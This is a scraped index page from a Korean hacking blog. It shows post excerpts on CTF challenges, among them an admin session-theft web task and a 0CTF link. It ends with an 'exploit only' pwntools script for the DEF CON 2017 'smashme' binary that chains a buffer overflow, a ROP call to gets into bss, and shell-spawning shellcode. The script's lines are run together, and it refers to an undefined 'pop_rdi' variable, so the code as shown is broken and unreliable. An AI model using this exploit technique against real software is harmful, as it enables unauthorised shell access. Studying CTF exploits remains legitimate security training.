Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
Tags
- 도메인 https
- NGINX
- https설정
- Codegate
- blueborne
- CODEGATE2018
- xlsx
- CVE
- node.js
- gogs
- 코드게이트 주니어
- codegate2017
- shellcraft
- https
- Hacking
- openctf
- pwnable
- module
- BLUETOOTH
- 코드게이트2017
- node
- 코드게이트
- Branch
- lob
- doorlock
- Git
- gogs private git
- 노드 엑셀
- npm
- pwntools
Archives
- Today
- Total
고졸백수해킹일기
카드를 만들수 있는 사이트가 있다. 관리자에게 내 카드를 볼 수 있게 하는 submit 메뉴가 있는데 이걸로 관리자의 세션을 탈취 하여 flag를 읽으면 되는 문제 같았다. 카드를 만드는 부분에서. value 부분에 html을 삽입할 수 있게 된다.
Web
2018. 4. 9. 03:10
0CTF easy-management
https://whit3hat.com/2018/04/05/0ps-ctf-easy-management-web/
etc
2018. 4. 9. 01:32
defcon2017 smashme (exploit only)
from pwn import *import time context(arch='amd64', os='linux')overflow = "Smash me outside, how bout dAAAAAAAAAAAbbbbbbbbbbbbbbbbbbbbbbbbbbbbbBBBB"bss = p64(0x6CB164)rdi = p64(0x4014d6)gets = p64(0x40fad0)shell = asm(shellcraft.sh()) payload = ""payload += overflowpayload += pop_rdi+bsspayload += gets+bss s = process("./smashme")s.sendline(payload)time.sleep(1)s.sendline(shell)s.interactive()
Pwnable
2018. 3. 28. 00:54